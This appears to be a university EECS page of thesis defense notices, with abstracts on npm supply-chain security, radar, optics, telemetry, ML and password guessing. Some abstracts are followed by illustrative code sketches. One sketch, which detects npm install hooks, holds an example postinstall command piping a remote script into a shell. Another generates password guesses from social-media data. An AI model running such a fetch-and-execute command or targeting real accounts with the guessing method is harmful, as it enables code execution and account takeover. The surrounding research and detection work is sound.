Defense Notices
All students and faculty are welcome to attend the final defense of EECS graduate students completing their M.S. or Ph.D. degrees. Defense notices for M.S./Ph.D. presentations for this year and several previous years are listed below in reverse chronological order.
Students who are nearing the completion of their M.S./Ph.D. research should schedule their final defenses through the EECS graduate office at least THREE WEEKS PRIOR to their presentation date so that there is time to complete the degree requirements check, and post the presentation announcement online.
Upcoming Defense Notices
Elizabeth Wyss
A New Frontier for Software Security: Diving Deep into npm
When & Where:
Eaton Hall, Room 2001B
Committee Members:
Drew Davidson, Chair
Alex Bardas
Fengjun Li
Bo Luo
J. Walker
Abstract
Open-source package managers (e.g., npm for Node.js) have become an established component of modern software development. Rather than creating applications from scratch, developers may employ modular software dependencies and frameworks--called packages--to serve as building blocks for writing larger applications. Package managers make this process easy. With a simple command line directive, developers are able to quickly fetch and install packages across vast open-source repositories. npm--the largest of such repositories--alone hosts millions of unique packages and serves billions of package downloads each week.
However, the widespread code sharing resulting from open-source package managers also presents novel security implications. Vulnerable or malicious code hiding deep within package dependency trees can be leveraged downstream to attack both software developers and the end-users of their applications. This downstream flow of software dependencies--dubbed the software supply chain--is critical to secure.
This research provides a deep dive into the npm-centric software supply chain, exploring distinctive phenomena that impact its overall security and usability. Such factors include (i) hidden code clones--which may stealthily propagate known vulnerabilities, (ii) install-time attacks enabled by unmediated installation scripts, (iii) hard-coded URLs residing in package code, (iv) the impacts of open-source development practices, (v) package compromise via malicious updates, (vi) spammers disseminating phishing links within package metadata, and (vii) abuse of cryptocurrency protocols designed to reward the creators of high-impact packages. For each facet, tooling is presented to identify and/or mitigate potential security impacts. Ultimately, it is our hope that this research fosters greater awareness, deeper understanding, and further efforts to forge a new frontier for the security of modern software supply chains.
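The install-time attack surface mentioned above comes from npm's lifecycle scripts, which run automatically when a package is installed. A minimal sketch of how such hooks can be surfaced from a manifest (the helper name and the example manifest are invented for illustration, not tooling from this work):

```python
import json

# Lifecycle hooks that npm runs automatically at install time; a package can
# abuse these to execute arbitrary commands on a developer's machine.
INSTALL_HOOKS = {"preinstall", "install", "postinstall"}

def find_install_scripts(package_json_text):
    """Return the install-time lifecycle scripts declared in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}

# Example manifest with a suspicious postinstall hook (contents are made up).
manifest = '{"name": "demo", "scripts": {"postinstall": "curl evil.sh | sh", "test": "jest"}}'
print(find_install_scripts(manifest))
```

Flagging declared hooks like this is only a first-pass heuristic; real mediation of installation scripts requires analyzing what the commands actually do.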
Alfred Fontes
Optimization and Trade-Space Analysis of Pulsed Radar-Communication Waveforms using Constant Envelope Modulations
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Patrick McCormick, Chair
Shannon Blunt
Jonathan Owen
Abstract
Dual function radar communications (DFRC) is a method of co-designing a single radio frequency system to perform simultaneous radar and communications service. DFRC is ultimately a compromise between radar sensing performance and communications data throughput due to the conflicting requirements between the sensing and information-bearing signals.
A novel waveform-based DFRC approach is phase-attached radar communications (PARC), where a communications signal is embedded onto a radar pulse via phase modulation between the two signals. The PARC framework is used here in a new waveform design technique that shapes the radar component of a PARC signal so that the expected power spectral density (PSD) of the PARC DFRC waveform matches a desired spectral template. This provides better control over the PARC signal spectrum, mitigating the degradation of PARC radar performance caused by spectral growth due to the communications signal.
The characteristics of optimized PARC waveforms are then analyzed to establish a trade-space between radar and communications performance within a PARC DFRC scenario. This is done by sampling the DFRC trade-space continuum with waveforms that contain a varying degree of communications bandwidth, from a pure radar waveform (no embedded communications) to a pure communications waveform (no radar component). Radar performance, which is degraded by range sidelobe modulation (RSM) from the communications signal randomness, is measured from the PARC signal variance across pulses; data throughput is established as the communications performance metric. Comparing the values of these two measures as a function of communications symbol rate explores the trade-offs in performance between radar and communications with optimized PARC waveforms.
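The phase-attachment idea above can be sketched in a few lines (illustrative chirp and QPSK parameters, not the optimized waveforms of this work): because the communications phase simply adds to the radar phase, the combined signal retains a constant envelope.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 256
t = np.arange(n) / n

phi_radar = np.pi * 50 * t**2        # linear-FM (chirp) radar phase history
# Random QPSK communications phase (continuous-phase shaping omitted here):
phi_comm = rng.choice([np.pi/4, 3*np.pi/4, 5*np.pi/4, 7*np.pi/4], size=n)

# Phase attachment: the communications phase rides on top of the radar phase.
s = np.exp(1j * (phi_radar + phi_comm))
print(np.allclose(np.abs(s), 1.0))   # True: the envelope is constant
```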
Arin Dutta
Performance Analysis of Distributed Raman Amplification with Different Pumping Configurations
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Rongqing Hui, Chair
Morteza Hashemi
Rachel Jarvis
Alessandro Salandrino
Hui Zhao
Abstract
As internet services like high-definition videos, cloud computing, and artificial intelligence keep growing, optical networks need to keep up with the demand for more capacity. Optical amplifiers play a crucial role in offsetting fiber loss and enabling long-distance wavelength division multiplexing (WDM) transmission in high-capacity systems. Various methods have been proposed to enhance the capacity and reach of fiber communication systems, including advanced modulation formats, dense wavelength division multiplexing (DWDM) over ultra-wide bands, space-division multiplexing, and high-performance digital signal processing (DSP) technologies. To maintain higher data rates along with maximizing the spectral efficiency of multi-level modulated signals, a higher Optical Signal-to-Noise Ratio (OSNR) is necessary. Despite advancements in coherent optical communication systems, the spectral efficiency of multi-level modulated signals is ultimately constrained by fiber nonlinearity. Raman amplification is an attractive solution for wide-band amplification with low noise figures in multi-band systems.
Distributed Raman Amplification (DRA) has been deployed in recent high-capacity transmission experiments to achieve a relatively flat signal power distribution along the optical path. It offers the unique advantage of using conventional low-loss silica fibers as the gain medium, effectively transforming passive optical fibers into active, amplifying waveguides. DRA can also provide gain at any wavelength by selecting the appropriate pump wavelength, enabling operation in signal bands outside the Erbium-doped fiber amplifier (EDFA) bands. A forward (FW) Raman pumping configuration can further improve DRA performance, as it is more efficient at improving OSNR: the optical noise is generated near the beginning of the fiber span and is attenuated along the fiber. A dual-order FW pumping scheme helps reduce the nonlinear effects on the optical signal and improves OSNR by distributing the Raman gain more uniformly along the transmission span.
The major concern with Forward Distributed Raman Amplification (FW DRA) is the fluctuation in pump power, known as relative intensity noise (RIN), which transfers from the pump laser to both the intensity and phase of the transmitted optical signal as they propagate in the same direction. Another concern with FW DRA is the rise in signal optical power near the start of the fiber span, which increases the nonlinear phase shift of the signal. These factors, including RIN-transfer-induced noise and nonlinear noise, degrade the performance of FW DRA systems at the receiver.
As the performance of DRA with backward pumping is well understood, with relatively low impact from RIN transfer, our research focuses on the FW pumping configuration. It is intended to provide a comprehensive analysis of the system-performance impact of dual-order FW Raman pumping, including the signal intensity and phase noise induced by the RIN of both the 1st- and 2nd-order pump lasers, as well as the impacts of linear and nonlinear noise. The efficiencies of pump RIN to signal intensity and phase noise transfer are theoretically analyzed and experimentally verified by applying a shallow intensity modulation to the pump laser to mimic the RIN. The results indicate that the efficiency of 2nd-order pump RIN to signal phase noise transfer can be more than two orders of magnitude higher than that from the 1st-order pump. The performance of dual-order FW Raman configurations is then compared with that of single-order Raman pumping to understand the trade-offs among system parameters. The nonlinear interference (NLI) noise is analyzed to study the overall OSNR improvement when employing a 2nd-order Raman pump. Finally, a DWDM system with 16-QAM modulation is used as an example to investigate the benefit of DRA with dual-order Raman pumping and with different pump RIN levels. We also consider a DRA system using a 1st-order incoherent pump together with a 2nd-order coherent pump. Although dual-order FW pumping corresponds to a slight increase in linear amplified spontaneous emission (ASE) compared with using only a 1st-order pump, its major advantage comes from the reduction of nonlinear interference noise in a DWDM system. Because the RIN of the 2nd-order pump has a much higher impact than that of the 1st-order pump, a more stringent requirement should be placed on the RIN of the 2nd-order pump laser when a dual-order FW pumping scheme is used for DRA in efficient fiber-optic communication.
Also, the system performance analysis reveals that higher-baud-rate systems, such as those operating at 100 Gbaud, are less affected by pump laser RIN due to the low-pass characteristics of the transfer of pump RIN to signal phase noise.
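The baud-rate effect above can be illustrated with a toy calculation (the cutoff, tone frequency, and amplitude below are invented, not the dissertation's transfer model): if the transferred phase noise is band-limited by a low-pass response, the peak phase change accumulated within one symbol shrinks as the symbol gets shorter.

```python
import numpy as np

A = 0.1            # assumed phase-noise tone amplitude, rad
f_noise = 100e6    # tone frequency near an assumed ~100 MHz transfer cutoff, Hz

results = {}
for baud in (1e9, 10e9, 100e9):
    T = 1.0 / baud                                      # symbol duration, s
    # Peak phase change across one symbol for a sinusoidal phase-noise tone:
    results[baud] = 2 * A * np.sin(np.pi * f_noise * T)
    print(f"{baud/1e9:6.0f} Gbaud: peak phase change per symbol = {results[baud]:.5f} rad")
```

The printed values fall by roughly a factor of ten per decade of baud rate, matching the qualitative claim that 100 Gbaud systems are less sensitive to pump RIN.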
Audrey Mockenhaupt
Using Dual Function Radar Communication Waveforms for Synthetic Aperture Radar Automatic Target Recognition
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Patrick McCormick, Chair
Shannon Blunt
Jon Owen
Abstract
Pending.
Rich Simeon
Delay-Doppler Channel Estimation for High-Speed Aeronautical Mobile Telemetry Applications
When & Where:
Eaton Hall, Room 2001B
Committee Members:
Erik Perrins, Chair
Shannon Blunt
Morteza Hashemi
Jim Stiles
Craig McLaughlin
Abstract
The next generation of digital communications systems aims to operate in high-Doppler environments such as high-speed trains and non-terrestrial networks that utilize satellites in low-Earth orbit. Current-generation systems use Orthogonal Frequency Division Multiplexing (OFDM) modulation, which is known to suffer from inter-carrier interference (ICI) when different channel paths have dissimilar Doppler shifts.
A new Orthogonal Time Frequency Space (OTFS) modulation (also known as Delay-Doppler modulation) is proposed as a candidate modulation for 6G networks that is resilient to ICI. To date, OTFS demodulation designs have focused on the use cases of popular urban terrestrial channel models where path delay spread is a fraction of the OTFS symbol duration. However, wireless wide-area networks that operate in the aeronautical mobile telemetry (AMT) space can have large path delay spreads due to reflections from distant geographic features. This presents problems for existing channel estimation techniques which assume a small maximum expected channel delay, since data transmission is paused to sound the channel by an amount equal to twice the maximum channel delay. The dropout in data contributes to a reduction in spectral efficiency.
Our research addresses OTFS limitations in the AMT use case. We start with an exemplary OTFS framework with parameters optimized for AMT. Following system design, we focus on two distinct areas to improve OTFS performance in the AMT environment. First, we propose a new channel estimation technique using a pilot signal superimposed over data that can measure large-delay-spread channels with no penalty in spectral efficiency. A successive interference cancellation algorithm is used to iteratively improve channel estimates and jointly decode data. The second aspect of our research aims to equalize in delay-Doppler space. In the delay-Doppler paradigm, the rapid channel variations seen in the time-frequency domain are transformed into a sparse, quasi-stationary channel in the delay-Doppler domain. We propose to use machine learning, specifically Gaussian Process Regression, to take advantage of this sparse, stationary channel and learn the channel parameters, compensating for the effects of fractional Doppler that simpler channel estimation techniques cannot mitigate. Both areas of research can advance the robustness of OTFS across all communications systems.
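The delay-Doppler/time-frequency duality underlying OTFS can be sketched with one common (I)SFFT convention (grid sizes and the specific FFT convention here are an assumption; implementations vary):

```python
import numpy as np

def isfft(x_dd):
    """Map a delay-Doppler grid x_dd[k, l] (k: Doppler, l: delay) to
    time-frequency: FFT along delay, IFFT along Doppler (orthonormal)."""
    return np.fft.fft(np.fft.ifft(x_dd, axis=0, norm="ortho"), axis=1, norm="ortho")

def sfft(x_tf):
    """Inverse map: back from time-frequency to delay-Doppler."""
    return np.fft.fft(np.fft.ifft(x_tf, axis=1, norm="ortho"), axis=0, norm="ortho")

rng = np.random.default_rng(1)
x_dd = rng.standard_normal((16, 64)) + 1j * rng.standard_normal((16, 64))
x_tf = isfft(x_dd)
print(np.allclose(sfft(x_tf), x_dd))   # True: the transform pair is invertible
```

Whatever sign convention is chosen, it is this 2D transform that spreads each delay-Doppler symbol across the whole time-frequency grid and turns rapid time-frequency variation into a quasi-stationary delay-Doppler channel.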
Mohammad Ful Hossain Seikh
AAFIYA: Antenna Analysis in Frequency-domain for Impedance and Yield Assessment
When & Where:
Eaton Hall, Room 2001B
Committee Members:
Jim Stiles, Chair
Rachel Jarvis
Alessandro Salandrino
Abstract
This project presents AAFIYA (Antenna Analysis in Frequency-domain for Impedance and Yield Assessment), a modular Python toolkit developed to automate and streamline the characterization and analysis of radiofrequency (RF) antennas using both measurement and simulation data. Motivated by the need for reproducible, flexible, and publication-ready workflows in modern antenna research, AAFIYA provides comprehensive support for all major antenna metrics, including S-parameters, impedance, gain and beam patterns, polarization purity, and calibration-based yield estimation. The toolkit features robust data ingestion from standard formats (such as Touchstone files and beam pattern text files), vectorized computation of RF metrics, and high-quality plotting utilities suitable for scientific publication.
Validation was carried out using measurements from industry-standard electromagnetic anechoic chamber setups involving both Log Periodic Dipole Array (LPDA) reference antennas and Askaryan Radio Array (ARA) Bottom Vertically Polarized (BVPol) antennas, covering a frequency range of 50–1500 MHz. Key performance metrics, such as broadband impedance matching, S11 and S21 related calculations, 3D realized gain patterns, vector effective lengths, and cross-polarization ratio, were extracted and compared against full-wave electromagnetic simulations (using HFSS and WIPL-D). The results demonstrate close agreement between measurement and simulation, confirming the reliability of the workflow and calibration methodology.
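One of the S11-related calculations mentioned above is the standard conversion from a measured reflection coefficient to input impedance (textbook relation, sketched here; this is not AAFIYA's actual API):

```python
def s11_to_impedance(s11, z0=50.0):
    """Z_in = Z0 * (1 + S11) / (1 - S11), valid for S11 != 1."""
    return z0 * (1 + s11) / (1 - s11)

print(s11_to_impedance(0.0))    # a perfectly matched port: 50 ohms
print(s11_to_impedance(1/3))    # a real 2:1 mismatch: ~100 ohms
```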
AAFIYA’s open-source, extensible design enables rapid adaptation to new experiments and provides a foundation for future integration with machine learning and evolutionary optimization algorithms. This work not only delivers a validated toolkit for antenna research and pedagogy but also sets the stage for next-generation approaches in automated antenna design, optimization, and performance analysis.
Soumya Baddham
Battling Toxicity: A Comparative Analysis of Machine Learning Models for Content Moderation
When & Where:
Eaton Hall, Room 2001B
Committee Members:
David Johnson, Chair
Prasad Kulkarni
Hongyang Sun
Abstract
With the exponential growth of user-generated content, online platforms face unprecedented challenges in moderating toxic and harmful comments. As a result, automated content moderation has emerged as a critical application of machine learning, enabling platforms to ensure user safety and maintain community standards. Despite its importance, challenges such as severe class imbalance, contextual ambiguity, and the diverse nature of toxic language often compromise moderation accuracy, leading to biased classification performance.
This project presents a comparative analysis of machine learning approaches for a Multi-Label Toxic Comment Classification System using the Toxic Comment Classification dataset from Kaggle. The study examines the performance of traditional algorithms, such as Logistic Regression, Random Forest, and XGBoost, alongside deep architectures, including Bi-LSTM, CNN-Bi-LSTM, and DistilBERT. The proposed approach utilizes word-level embeddings across all models and examines the effects of architectural enhancements, hyperparameter optimization, and advanced training strategies on model robustness and predictive accuracy.
The study emphasizes the significance of loss function optimization and threshold adjustment strategies in improving the detection of minority classes. The comparative results reveal distinct performance trade-offs across model architectures: transformer models achieve superior contextual understanding at the cost of computational complexity, while deep learning approaches (LSTM-based models) offer efficiency advantages. These findings establish evidence-based guidelines for model selection in real-world content moderation systems, striking a balance between accuracy requirements and operational constraints.
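The threshold adjustment idea above can be sketched for a single minority label (the scores and labels below are invented; any model's held-out validation outputs would slot in): instead of the default 0.5 cut-off, sweep thresholds and keep the one maximizing F1.

```python
def f1(y_true, y_pred):
    """F1 score for binary labels/predictions given as 0/1 lists."""
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    return 2 * tp / (2 * tp + fp + fn) if tp else 0.0

def best_threshold(scores, labels, grid=None):
    """Pick the decision threshold that maximizes F1 on held-out data."""
    grid = grid or [i / 100 for i in range(1, 100)]
    return max(grid, key=lambda th: f1(labels, [int(s >= th) for s in scores]))

scores = [0.9, 0.4, 0.35, 0.2, 0.1, 0.05]   # model scores for a minority label
labels = [1,   1,   1,    0,   0,   0]       # ground truth
th = best_threshold(scores, labels)
print(th, f1(labels, [int(s >= th) for s in scores]))
```

In a multi-label system this tuning is repeated per label, which is precisely where minority classes gain the most over a uniform 0.5 threshold.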
Past Defense Notices
Aiden Liang
Enhancing Healthcare Resource Demand Forecasting Using Machine Learning: An Integrated Approach to Addressing Temporal Dynamics and External Influences
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Prasad Kulkarni, Chair
Fengjun Li
Zijun Yao
Abstract
This project aims to enhance predictive models for forecasting healthcare resource demand, particularly focusing on hospital bed occupancy and emergency room visits while considering external factors such as disease outbreaks and weather conditions. Utilizing a range of machine learning techniques, the research seeks to improve the accuracy and reliability of these forecasts, essential for optimizing healthcare resource management. The project involves multiple phases, starting with the collection and preparation of historical data from public health databases and hospital records, enriched with external variables such as weather patterns and epidemiological data. Advanced feature engineering is key, transforming raw data into a machine learning-friendly format, including temporal and lag features to identify patterns and trends. The study explores various machine learning methods, from traditional models like ARIMA to advanced techniques such as LSTM networks and GRU models, incorporating rigorous training and validation protocols to ensure robust performance. Model effectiveness is evaluated using metrics like MAE, RMSE, and MAPE, with a strong focus on model interpretability and explainability through techniques like SHAP and LIME. The project also addresses practical implementation challenges and ethical considerations, aiming to bridge academic research with practical healthcare applications. Findings are intended for dissemination through academic papers and conferences, ensuring that the models developed meet both the ethical standards and practical needs of the healthcare industry.
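The lag-feature engineering described above can be sketched in a few lines (the occupancy numbers are invented): a daily series is turned into (features, target) rows using the previous `n_lags` days to predict the next day.

```python
def make_lag_features(series, n_lags):
    """Build supervised-learning rows from a univariate time series."""
    rows = []
    for i in range(n_lags, len(series)):
        rows.append((series[i - n_lags:i], series[i]))   # (lag window, target)
    return rows

occupancy = [112, 118, 121, 117, 125, 130, 128]   # e.g., daily bed occupancy
for feats, target in make_lag_features(occupancy, 3):
    print(feats, "->", target)
```

External variables such as weather or epidemiological indicators would be appended to each lag window before training.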
Thomas Atkins
Secure and Auditable Academic Collections Storage via Hyperledger Fabric-Based Smart Contracts
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Drew Davidson, Chair
Fengjun Li
Bo Luo
Abstract
This paper introduces a novel approach to manage collections of artifacts through smart contract access control, rooted in on-chain role-based property-level access control. This smart contract facilitates the lifecycle of these artifacts including allowing for the creation, modification, removal, and historical auditing of the artifacts through both direct and suggested actions. This method introduces a collection object designed to store role privileges concerning state object properties. User roles are defined within an on-chain entity that maps users' signed identities to roles across different collections, enabling a single user to assume varying roles in distinct collections. Unlike existing key-level endorsement mechanisms, this approach offers finer-grained privileges by defining them on a per-property basis, not at the key level. The outcome is a more flexible and fine-grained access control system seamlessly integrated into the smart contract itself, empowering administrators to manage access with precision and adaptability across diverse organizational contexts. This has the added benefit of allowing for the auditing of not only the history of the artifacts, but also for the permissions granted to the users.
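A toy model of the per-property privilege check described above (plain Python for illustration, not Fabric chaincode; all names are invented): privileges are stored per role and per property, and a user's role is resolved within a collection before any modification is allowed.

```python
collection = {
    "privileges": {          # role -> set of state properties the role may modify
        "curator": {"title", "description", "location"},
        "viewer": set(),
    },
    "roles": {"alice": "curator", "bob": "viewer"},   # signed identity -> role
}

def may_modify(collection, user, prop):
    """Property-level check: finer-grained than key-level endorsement."""
    role = collection["roles"].get(user)
    return prop in collection["privileges"].get(role, set())

print(may_modify(collection, "alice", "title"))   # True
print(may_modify(collection, "bob", "title"))     # False
```

Because the role map is itself on-chain state, the same user can hold different roles in different collections, and every privilege change is auditable alongside the artifact history.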
Theodore Harbison
Posting Passwords: How social media information can be leveraged in password guessing attacks
When & Where:
Zoom Defense, please email jgrisafe@ku.edu for defense link.
Committee Members:
Hossein Saiedian, Chair
Fengjun Li
Heechul Yun
Abstract
The explosion of social media, while fostering connection, inadvertently exposes personal details that heighten password vulnerability. This thesis tackles this critical link, aiming to raise public awareness of the dangers of weak passwords and excessive online sharing. We introduce a novel password guessing algorithm, SocGuess, which capitalizes on the rich trove of information in social media profiles. SocGuess leverages Named Entity Recognition (NER) to identify key data points within this information, such as dates, locations, and names. To further enhance its accuracy, SocGuess is trained on the RockYou dataset, a large collection of leaked passwords. By identifying different kinds of entities within these passwords, SocGuess can calculate the probability of these entities appearing in passwords. Armed with this knowledge, SocGuess dynamically generates password guesses in order of probability by filling entity placeholders with the corresponding data points harvested from the target's social media profiles. In our experiments, this targeted approach enabled SocGuess to crack 33% more passwords than existing algorithms, demonstrably surpassing traditional methods.
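The template-filling step can be sketched as follows (the templates, probabilities, and profile data are all invented for illustration; this is not SocGuess itself): entity templates mined from leaked passwords are filled with profile-harvested values, most probable template first.

```python
from itertools import product

templates = [                      # (entity template, probability from corpus)
    ("{NAME}{DATE}", 0.05),
    ("{CITY}{DATE}", 0.02),
]
profile = {"NAME": ["rex"], "DATE": ["1990", "0412"], "CITY": ["topeka"]}

def generate_guesses(templates, profile):
    """Yield candidate passwords in descending template probability."""
    for template, _p in sorted(templates, key=lambda t: -t[1]):
        # Extract slot names, e.g. "{NAME}{DATE}" -> ["NAME", "DATE"].
        slots = [s.strip("{}") for s in template.replace("}{", "} {").split()]
        for combo in product(*(profile[s] for s in slots)):
            out = template
            for slot, value in zip(slots, combo):
                out = out.replace("{" + slot + "}", value, 1)
            yield out

print(list(generate_guesses(templates, profile)))
```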
Ethan Grantz
Swarm: A Backend-Agnostic Language for Simple Distributed Programming
When & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Drew Davidson, Chair
Perry Alexander
Prasad Kulkarni
Abstract
Writing algorithms for a parallel or distributed environment has always been plagued with a variety of challenges, from supervising synchronous reads and writes, to managing job queues and avoiding deadlock. While many languages have libraries or language constructs to mitigate these obstacles, very few attempt to remove those challenges entirely, and even fewer do so while divorcing the means of handling those problems from the means of parallelization or distribution. This project introduces a language called Swarm, which attempts to do just that.
Swarm is a first-class parallel/distributed programming language with modular, swappable parallel drivers. It is intended for everything from multi-threaded local computation on a single machine to large scientific computations split across many nodes in a cluster.
Swarm contains next to no explicit syntax for typical parallel logic, providing only keywords for declaring which variables should reside in shared memory and for describing which code should be parallelized. The remainder of the logic (such as waiting for the results of distributed jobs or locking shared accesses) is added when compiling to a custom bytecode called Swarm Virtual Instructions (SVI). SVI is then executed by a virtual machine whose parallelization logic is abstracted out, such that the same SVI bytecode can be executed in any parallel/distributed environment.
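The swappable-driver idea can be illustrated in Python (a loose analogue only; Swarm does this at the bytecode/VM level, and the class names here are invented): the user's job code contains no parallel syntax, and the same job runs under any driver.

```python
from concurrent.futures import ThreadPoolExecutor

class SequentialDriver:
    """Runs jobs one at a time on the local machine."""
    def run(self, fn, items):
        return [fn(x) for x in items]

class ThreadDriver:
    """Runs the same jobs across a pool of threads."""
    def __init__(self, workers=4):
        self.workers = workers
    def run(self, fn, items):
        with ThreadPoolExecutor(self.workers) as pool:
            return list(pool.map(fn, items))   # map preserves input order

def job(x):          # user logic: no parallel syntax whatsoever
    return x * x

for driver in (SequentialDriver(), ThreadDriver()):
    print(driver.run(job, range(5)))
```

A cluster driver with the same `run` interface could be dropped in without touching `job`, which is the property Swarm builds into its virtual machine.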
Johnson Umeike
Optimizing gem5 Simulator Performance: Profiling Insights and Userspace Networking Enhancements
When & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Mohammad Alian, Chair
Prasad Kulkarni
Heechul Yun
Abstract
Full-system simulation of computer systems is critical for capturing the complex interplay between various hardware and software components in future systems. Modeling the network subsystem is indispensable for the fidelity of full-system simulations due to the increasing importance of scale-out systems. Over the last decade, the network software stack has undergone major changes, with userspace networking stacks and data-plane networks rapidly replacing the conventional kernel network stack. Nevertheless, the current state-of-the-art architectural simulator, gem5, still employs kernel networking, which precludes realistic network application scenarios.
First, we perform a comprehensive profiling study to identify and propose architectural optimizations to accelerate a state-of-the-art architectural simulator. We choose gem5 as the representative architectural simulator, run several simulations with various configurations, perform a detailed architectural analysis of the gem5 source code on different server platforms, tune both system and architectural settings for running simulations, and discuss the future opportunities in accelerating gem5 as an important application. Our detailed profiling of gem5 reveals that its performance is extremely sensitive to the size of the L1 cache. Our experimental results show that a RISC-V core with 32KB data and instruction cache improves gem5’s simulation speed by 31%∼61% compared with a baseline core with 8KB L1 caches. Second, this work extends gem5’s networking capabilities by integrating kernel-bypass/user-space networking based on the DPDK framework, significantly enhancing network throughput and reducing latency. By enabling user-space networking, the simulator achieves a substantial 6.3× improvement in network bandwidth compared to traditional Linux software stacks. Our hardware packet generator model (EtherLoadGen) provides up to a 2.1× speedup in simulation time. Additionally, we develop a suite of networking micro-benchmarks for stress testing the host network stack, allowing for efficient evaluation of gem5’s performance. Through detailed experimental analysis, we characterize the performance differences when running the DPDK network stack on both real systems and gem5, highlighting the sensitivity of DPDK performance to various system and microarchitecture parameters.
Adam Sarhage
Design of Multi-Section Coupled Line Coupler
When & Where:
Eaton Hall, Room 2001B
Committee Members:
Jim Stiles, Chair
Chris Allen
Glenn Prescott
Abstract
Coupled line couplers are used as directional couplers to enable measurement of forward and reverse power in RF transmitters. These measurements provide valuable feedback to the control loops regulating transmitter power output levels. This project seeks to synthesize, simulate, build, and test a broadband, five-stage coupled line coupler with a 20 dB coupling factor. The coupler synthesis is evaluated against ideal coupler components in Keysight ADS. Fabrication of coupled line couplers is typically accomplished with a stripline topology, but a microstrip topology is additionally evaluated. Measurements from the fabricated coupled line couplers are then compared to the Keysight ADS EM simulations, and some explanations for the differences are provided. Additionally, measurements from a commercially available broadband directional coupler are provided to show what can be accomplished with the right budget.
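The starting point of single-section coupled-line synthesis can be sketched with the standard textbook relations (illustrative only; the five-stage broadband synthesis in this project is more involved): a 20 dB coupling factor corresponds to a voltage coupling coefficient c = 0.1, which fixes the required even- and odd-mode impedances.

```python
import math

def coupled_line_impedances(coupling_db, z0=50.0):
    """Even/odd mode impedances for a single coupled-line section."""
    c = 10 ** (-coupling_db / 20)              # voltage coupling coefficient
    z0e = z0 * math.sqrt((1 + c) / (1 - c))    # even-mode impedance
    z0o = z0 * math.sqrt((1 - c) / (1 + c))    # odd-mode impedance
    return c, z0e, z0o

c, z0e, z0o = coupled_line_impedances(20.0)
print(f"c = {c:.3f}, Z0e = {z0e:.2f} ohms, Z0o = {z0o:.2f} ohms")
```

Note that Z0e * Z0o = Z0^2 by construction, which keeps the coupler matched to the system impedance.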
Mohsen Nayebi Kerdabadi
Contrastive Learning of Temporal Distinctiveness for Survival Analysis in Electronic Health Records
When & Where:
Nichols Hall, Room 250 (Gemini Room)
Committee Members:
Zijun Yao, Chair
Fengjun Li
Cuncong Zhong
Abstract
Survival analysis plays a crucial role in many healthcare decisions, where the risk prediction for the events of interest can support an informative outlook for a patient's medical journey. Given the existence of data censoring, an effective way of survival analysis is to enforce the pairwise temporal concordance between censored and observed data, aiming to utilize the time interval before censoring as partially observed time-to-event labels for supervised learning. Although existing studies mostly employed ranking methods to pursue an ordering objective, contrastive methods which learn a discriminative embedding by having data contrast against each other, have not been explored thoroughly for survival analysis. Therefore, we propose a novel Ontology-aware Temporality-based Contrastive Survival (OTCSurv) analysis framework that utilizes survival durations from both censored and observed data to define temporal distinctiveness and construct negative sample pairs with adjustable hardness for contrastive learning. Specifically, we first use an ontological encoder and a sequential self-attention encoder to represent the longitudinal EHR data with rich contexts. Second, we design a temporal contrastive loss to capture varying survival durations in a supervised setting through a hardness-aware negative sampling mechanism. Last, we incorporate the contrastive task into the time-to-event predictive task with multiple loss components. We conduct extensive experiments using a large EHR dataset to forecast the risk of hospitalized patients who are in danger of developing acute kidney injury (AKI), a critical and urgent medical condition. The effectiveness and explainability of the proposed model are validated through comprehensive quantitative and qualitative studies.
Jarrett Zeliff
An Analysis of Bluetooth Mesh Security Features in the Context of Secure Communications
When & Where:
Eaton Hall, Room 1
Committee Members:
Alexandru Bardas, Chair
Drew Davidson
Fengjun Li
Abstract
Significant developments in communication methods to help support at-risk populations have emerged over the last 10 years. We view at-risk populations as groups of people present in environments where the use of infrastructure or electricity, including telecommunications, is censored and/or dangerous. Security features that accompany these communication mechanisms are essential to protect the confidentiality of their users and the integrity and availability of the communication network.
In this work, we look at the feasibility of using Bluetooth Mesh as a communication network and analyze the security features inherent to the protocol. Through this analysis, we determine the strengths and weaknesses of Bluetooth Mesh security features when used as a messaging medium for at-risk populations and provide improvements to current shortcomings. Our analysis covers the Bluetooth Mesh networking security fundamentals as described by the Bluetooth SIG: Encryption and Authentication, Separation of Concerns, Area Isolation, Key Refresh, Message Obfuscation, Replay Attack Protection, Trashcan Attack Protection, and Secure Device Provisioning. We examine how each security feature is implemented and determine whether these implementations are sufficient to protect users from various attack vectors. For example, we examined the Blue Mirror attack, a reflection attack during the provisioning process that leads to the compromise of network keys, while also assessing the under-researched key refresh mechanism. We propose a mechanism to address Blue-Mirror-oriented attacks with the goal of creating a more secure provisioning process. To analyze the key refresh mechanism, we built our own full-fledged Bluetooth Mesh network and implemented a key refresh mechanism within it. Through this, we assess the throughput, range, and impacts of a key refresh in both lab and field environments, demonstrating the suitability of our solution as a secure communication method.
Daniel Johnson
Probability-Aware Selective Protection for Sparse Iterative Solvers
When & Where:
Nichols Hall, Room 246 (Executive Conference Room)
Committee Members:
Hongyang Sun, Chair
Perry Alexander
Zijun Yao
Abstract
